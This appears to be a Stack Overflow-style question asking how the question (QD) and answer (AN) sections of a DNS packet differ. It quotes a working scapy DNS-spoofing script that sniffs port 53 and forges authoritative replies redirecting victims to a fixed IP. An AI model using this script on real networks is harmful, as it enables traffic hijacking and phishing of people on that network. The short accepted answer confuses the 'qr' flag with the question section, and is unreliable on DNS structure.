# What are the functions of different kinds of resource record blocks in a DNS packet?

Tags: networking, dns, scapy

I know the structure of a resource record section, which kind of looks like this: [enter image description here](https://i.stack.imgur.com/EEdjv.png)

But I'm completely lost when reading the source code of a dns spoof plugin:

```
    from scapy.all import *
def dns_spoof(pkt):
    redirect_to = '172.16.1.63'
    if pkt.haslayer(DNSQR): # DNS question record
        spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                      UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                      DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa = 1, qr=1, \
                      an=DNSRR(rrname=pkt[DNS].qd.qname,  ttl=10, rdata=redirect_to))
        send(spoofed_pkt)
        print 'Sent:', spoofed_pkt.summary()
sniff(filter='udp port 53', iface='wlan0', store=0, prn=dns_spoof)
```

what are the differences between the QD and AN RRs and why do we have to use QD in this packet?

Answer (score 0, accepted):

DNS qr should be interpreted as the query data sent by the client. Scapy uses the DNSQR field to represent this structure. Thus, it's easier to separate the qr section with the other RR fields.